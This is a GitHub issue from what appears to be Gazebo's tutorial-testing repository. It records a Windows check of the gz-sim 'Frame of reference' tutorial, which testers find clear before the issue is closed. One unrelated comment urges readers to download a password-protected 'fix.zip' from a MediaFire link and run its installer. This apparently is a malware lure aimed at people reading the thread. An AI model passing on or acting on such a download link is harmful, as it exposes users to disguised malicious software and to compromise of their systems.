gazebosim/gazebo_test_cases #1177: gz-sim: Frame of reference

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/api/sim/9/frame_reference.html)
* [Source](https://github.com/gazebosim/gz-sim/tree/gz-sim9/tutorials/frame_reference.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

marcelo-antonio-nunes, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

knmcguire, 2024-09-13:
I'll work on this now on windows 11

knmcguire, 2024-09-13:
✅ Looks good to me, there is not a lot to try but the instructions are clear and all the links work

ahcorde, 2024-09-13:
Thank you for testing!

closed 2024-09-13 by ahcorde